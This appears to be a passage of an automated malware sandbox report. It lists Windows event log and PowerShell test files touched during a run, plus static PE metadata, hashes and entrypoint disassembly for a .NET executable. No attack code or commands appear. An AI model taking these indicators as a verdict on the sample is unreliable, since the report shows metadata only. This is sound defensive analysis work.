                                                                                                                                SSDEEP:384:khHivRiLiakrkEi5iciMiHiQi8ixiBiFioikiFiixFiIMZifiwiLitixgZJiJi/P:kgtxHMa
                                                                                                                                MD5:9961A2C4F5AC430AB4FE55D69904E2C9
                                                                                                                                SHA1:BA49A1A12A889812148BECC8D5B285AD418D54FE
                                                                                                                                SHA-256:EAE8AAB4F398C27A8E7855C8524389EBE4F695B28D2B51E9EA916738D5E579E9
                                                                                                                                SHA-512:B7B0B29444E2B9BECCA18B96D5CA3D7098236C9919F7DE59A37405012C19C6B641CD3C1DA7E9E12F454004B93BB022F689125D31E26825929BB9A7D79FEF3199
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.y...............y................... d..0f.....6.....................................................................;.................>,..........................=.......................#.......................................>...........................................................f...............?.......................P.......................M...F...................................................9.......n(...............................................:...............,......................**......y..........a...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):3.401296006702087
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:lOaQLVa/afana3aWWanaDaXa7aKOaHa3afaDaza7a7azaXaLa3aDaranaTaDabaa:2LAKe
                                                                                                                                MD5:5643CF359CE3CFF57398674E186C8D4D
                                                                                                                                SHA1:7E7180AAAD2A14F43C9B266746A11FE19DFC6E75
                                                                                                                                SHA-256:6598FA0988D715D8120BA92E775224956912765DFA4F1BDF2ED34E19299C4600
                                                                                                                                SHA-512:426A4B3BDA4041DA3F6B815750AFCAC780F61552824D20945CF317582EDF3A40EC46C0F59D3E874DD0CB82BA47935D6AEC31CAE24A87D3508548B0E5A72BCE0B
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........@...............@...............`...R."<.....................................................................p..................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&...;...................................**..H...........,...f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):1.3650161876414235
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:2haXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJiXJtXJiXJWTXJpXJUXJ4XJ:2Q0yUkNYwD8imLEWTWW1fsg
                                                                                                                                MD5:346E087AE87A771402B2E38619AB7B71
                                                                                                                                SHA1:4B7EFEA99E401A5E6C0D115E2B27C48778704C13
                                                                                                                                SHA-256:82B60B9565D3FDA733EF5B4A6996AD51C08BC604BE6DC184255A8928B1220EE5
                                                                                                                                SHA-512:63C3EB568562AD3560924F7830F0ED120CC362A9FC24EA6CCE4B0EC5F90A0BBEF58539C26B5379A5E6D1939BED7D06A92B4A2521775AF2516793F42A289C0E4B
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk......................................A...D.....<....................................................................7...................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................................................6..........C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.335318634068108
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:ehRmsmRm1m4mXm9mSmBmStmtmimMmAmAmRmcmxHmEmqmwmHmLmlm9mGmdmpm3mfr:euDcxMmo
                                                                                                                                MD5:3B31610BEABB5895A19C346C64C234C6
                                                                                                                                SHA1:84316C06991A51AD91C247130B615F0E56CD4D01
                                                                                                                                SHA-256:EA4D4D4A4D56D42B0205793B2C9E45A732EA2F8909095BF924C2F4A138DE0404
                                                                                                                                SHA-512:2B9784678702654E8FA65456A501F9F6B48ABD575EE58264709A97FFF9C38C26C7A6ED9057278E1A090BBB4BD2F88FBC95E636D9DEE509142B67B4D81FBAB5A1
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk......................................'...(..'.D........................................................................R................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...............................................K...........................................%...............&.......................................**.................Hf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):0.7112352075765392
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:BV7VDiDL/bDiDwTDiDHDiDDDiDSDiD8DiDkDiD0DiDEDiDMDiDMDiDMDiD:BhV2nT2UT272/2+2w2g2w2I2o2A2I2
                                                                                                                                MD5:5D63AFB3EA60A7655FF95B4DB1B451E0
                                                                                                                                SHA1:B5D236316CC6617071D83D7E1B4367DDA1A889B1
                                                                                                                                SHA-256:815D1AE9187ED88319DDCD4F95D544E3B4FC3D12E2BF9A0DFD30441819089010
                                                                                                                                SHA-512:C00665A8527B92BB677696119894947DA47603CD1168B3536E7317E8D82C1A3563D50612C4AEF5BDEE75D491AEC97F8AB543F5FA1EB5E4080E7B1D8A55FE57E6
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.............................................u.=k....................................................................Z}#.................N.......................v...=...........................................................................................................................f...............?...........................m...................M...F...............................'...........................................................................&.......................................**.................sf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-WER-PayloadHealth%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 9, DIRTY
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):69632
                                                                                                                                Entropy (8bit):1.2795587664007206
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:hvEpP9JcY6+g4+Ga6oNpk13xIb13xIb13xIt13xI:hspP9JcY6+g4+Ga6
                                                                                                                                MD5:74C75C1A7AD30A72673CE68DF4ECEA9C
                                                                                                                                SHA1:D72DA4125E29E8DB01101F932A48528BC5D24A82
                                                                                                                                SHA-256:BD11DE7F5F91AE7AB356FAB0851D01F1DC58493D274A5BAB344C8A98AA29AF8A
                                                                                                                                SHA-512:9688749CFE35FB56C7A072B73F50EE84394B8177443E4BD47B27AFD991AA78BD91E806AC6F5BDD5C79699FCD9A00B11E1316C7596AFD868C4B3E9A662E8343D3
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfFile.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):83072
                                                                                                                                Entropy (8bit):4.353520935938755
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:U8RHRRwZhlR0CsRNHSRDR0mRpyR2R5MRZ2RHRpPRFrRXVRcrRb8RWRrR4QRSRQUQ:UwwZiFE3NI538LMKwZiFU
                                                                                                                                MD5:7614591D5943EF819B01F33730B572F8
                                                                                                                                SHA1:3FE0E0ED6FC0DA4D1A1F3D6A5565DFD9057CBAC8
                                                                                                                                SHA-256:7B62ACBA99217024237A45C230D9CE2560B3955DA1EC307431C27FBE3E865C0F
                                                                                                                                SHA-512:323D1A68EBE67697E83E2E166E8D6AF53C971079043185FFBA2C0D470A07EE8E6488AB4D98274DE13992BB5C47D1FF586B39033F86956D79C4DC687E2688079D
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.J.......S.......J.......S...........@1..04..Y......................................................................'k5.....................C.......Q............#..=........................................+..d...................."...#...........................................#......(...f...+...........?....................... .......................M...F........#......L#..............................&...........................................................q+..................................*...**......R.......>lq.QN.........'.z&...............................................................<.......T...-.!................@>lq.QN..u...ex.M...............R....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l..............*...................P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.......w.m.i.p.r.v.s.e...e.x.e.......".%.P.r.o.g.r.a.m.D.a.t.a.%.\.M.i.c

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.282820835556058
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:chOhpuhdh+h9hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhr:cQsFpkBc1S
                                                                                                                                MD5:7DB7567819F7CFC6955126B8306826E6
                                                                                                                                SHA1:45CCB1C41CA1C6E1384207444A8B84437408DF1A
                                                                                                                                SHA-256:0DDCE2B5ADFAAB4EF8A1686D0064B8CCFF43B1D3C93893A62EF07B7FB896E8E5
                                                                                                                                SHA-512:FF5F662885580210B522215F56FD29417B6555F0878610D44D8F798E044876F99F86C5FF688BB77C92B894368E5DF32130B52BFE37401BACD3305B63463A2394
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........................................P.....Q................................................................................................................:...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&...............!.......................**...............k..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):1.232783163157918
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVMV3VJmVhpVEVA:Zyjbj
                                                                                                                                MD5:71A005B17A2D32C10709277023D447E6
                                                                                                                                SHA1:14754F04007D539159F75D62AACC6A282CAA8D54
                                                                                                                                SHA-256:6E220C6CCBB76AEE639EDFCC6204C80EEC9FA1CCE0AC40EE4B821AF3AC27887B
                                                                                                                                SHA-512:BC3533B3DEF1BC8B7D990700CA573EFF57D05C4E72DF2BB536247466D5FE9EB5DFE6F2EC18F02C808449F998AC00E26E920E3984B4E8367F8E9AF188BD1D9518
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........!...............!............7..`8...).....................................................................Ce.~................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v................................................+......................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.213072277113163
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:whZBwBjsrBwBhBwBj4BwB6p+/4WBwBQ/cBwBjQNqObx13ABwBqhdBwBQ/LQBwBQX:wOsc6QNqObxnyS3qes
                                                                                                                                MD5:F334D4BB0C79B0D18FB3CB3892E3D8CE
                                                                                                                                SHA1:4DC3402CD38BDB2639693C2F2A2F676DF2AD5911
                                                                                                                                SHA-256:8844AAF909AA1BD96605F7B0CDE3459B47228CB828D8B679CF6FB8EF576C4A1C
                                                                                                                                SHA-512:D50767906323578043A3D6863AADFB72DD2ACF435DC879E07D74B7583F6CCDB430A940F1750AC343C9287AFFAF8D4E830BE7E71358B474E6B8DB870C8AB3457F
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.^.......m.......^.......m...........@;..p>.....i......................................................................9.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................g...............................................................................&.......................................**.. ...^...........f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.414298413407747
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:3thQUE2UEFUE5UEKUEODUEzUEFUEsUE/UEGUE6UEWUE9UEtUEBUE8UEGUEuUE5UD:9w/RPoP6e
                                                                                                                                MD5:77D9AFD001F6BBD592C19652D671FEA3
                                                                                                                                SHA1:B87EA73299713B00D44A123C4B48636957EA90CE
                                                                                                                                SHA-256:E25E174DE18D3B90B5EBC3C394A7C6BFC34F3E27FB260758BC8CB135E4D45770
                                                                                                                                SHA-512:C81A545351015315060E812535A43C97A0FCBC2F49AA2034B50F963839F7F7DC1BC16EF070D5FF951E5FE82A9B315E8EFC20470707FD8C995A932E44369845E8
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........................................8...,..t......................................................................>................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..............._..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                C:\Windows\System32\winevt\Logs\Security.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):96528
                                                                                                                                Entropy (8bit):4.327251587633544
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:sHFRuHFReTjoNSg0PtocChoLu60zCwySonMt0SoHMtoLoHMtaoDoH5OD0obO9ZoI:sl8lwFj0Dyid9s5AryVpxy/2sV
                                                                                                                                MD5:8EBB546B814A9855225FC9BACDF7094F
                                                                                                                                SHA1:EB1D89C6571ED7E5EA78D879D70D31B02C63952D
                                                                                                                                SHA-256:8C3F47E99BF82C008C8596DC15D7E33F4BABF06AEB258C96CFA530E49AA8572F
                                                                                                                                SHA-512:87E0355DADB5EACF949A6EAB1E9A908BDD68377E3FC3339145862AD79F76EC850CA541B97D428B6723072B69C47323E72DE083A0B2D9CBE4F5286AB90A6794F1
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk......................................... ............................................................................P.~....................s...h...............N...=...................................................N...............................................w.......6......................./...................................]...........).......M...T...:...............................................................................................................&...............................**.. ............~5.QN..........*.&.........*.9.LS5..f....A.......A..5...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....^...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                                                                                                                                C:\Windows\System32\winevt\Logs\System.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):75640
                                                                                                                                Entropy (8bit):4.381752856539519
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:GqQqk0TXMo46/iP6f/uwu3hpRKe+PH+YekyqCcvU:zVk0TXMFfP6ipMPZdnvU
                                                                                                                                MD5:7B19C67BA47E63F7744110C23B806565
                                                                                                                                SHA1:2B8672FF5816044298689B4C1A7F6DBA2447729A
                                                                                                                                SHA-256:2A4949615C1321646119DBCC46799F3C63E06CFAC5457677FEB7E74675B7443E
                                                                                                                                SHA-512:A501552AB23C398E64A97CFD9EF1191FCCF781C2BEA3C1CF705997532E8C835977E04383EA352598B75AEAF4451AF38FC8F1C889534E6E57F895D0BADA5D4EA2
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk..............................................7.......................................................................zSy....................s...h...............N...=...................................................N...............................................w.......2.......................G...................................Y...........).......M...5...:........................................................................................................... ...........................&.......**...............~5.QN.........#m.&........#m...].N.I.P.=.......A..1...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....Z...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                                                                                                                                C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):188472
                                                                                                                                Entropy (8bit):3.8846887556551284
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:kNKuZNKufNKubNKuZNKufNKuugNKuMNKuZNKufNKuk:kNKuZNKufNKubNKuZNKufNKuugNKuMNm
                                                                                                                                MD5:08321C39857863DC7EF390B859E1AF97
                                                                                                                                SHA1:AB0B6BC0AD6F44737EE86AA5EB7E6228B44CB721
                                                                                                                                SHA-256:AECF68FDF4289CB34325FF1F2C71AEB8467ADC3EA3DB39EA1DC974B89354F22B
                                                                                                                                SHA-512:6F5120D46E605AA9E31D6C7500725014D06ACD593BF88259C30F833DD58638363CDCE39E3EC1844C7AA9EAF056D25356B0AAFAAF0C8A8B90E85F3C575A88248B
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.................n.......x.....................z.....................................................................FK,.............................................=..........................................................................................................................._...............8...........................f...................M...c...........................p...............&.......................................................................................................**...2..n.......2...QN........!j..&.......!j....:Tc`.)..h........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_eco4jnsl.5iq.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_j21buhlf.5pf.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Entropy (8bit):7.973935549231534
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                File name:RdLfpZY5A9.exe
                                                                                                                                File size:265'216 bytes
                                                                                                                                MD5:28db4677dcbbaa0a4c5adbc02c9da4f3
                                                                                                                                SHA1:e1f0199ed131a90e25204399e4e876da64ea3ba5
                                                                                                                                SHA256:b871ed20d46a9be3a4aedb5facad152ab24289b6866076cb7ffc59721ca7525c
                                                                                                                                SHA512:718ad88f930160a83c59d9f73d41cf4ea76de3c929956bffb618631d6450b7f59d4b2eb62afa59eff29461b256c402d387df9fdadee9a1a9d1b5e65cea45de52
                                                                                                                                SSDEEP:6144:ByHp/aGMFlSShM00Iyew/2xrvhwCS9KSyiIBov:IJ/pFJIyN/2RbhHiIS
                                                                                                                                TLSH:E444123881DC5C93CA564BF9347A9C127F398DE6F21C9FF929222553F1E227A4488F94
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q]g.............................!... ...@....@.. ....................................@................................

                                                                                                                                File Icon

                                                                                                                                Icon Hash:00928e8e8686b000

                                                                                                                                Static PE Info

                                                                                                                                General

                                                                                                                                Entrypoint:0x4421ce
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x675D711D [Sat Dec 14 11:50:53 2024 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:4
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:4
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:4
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                Entrypoint Preview

                                                                                                                                Instruction
                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
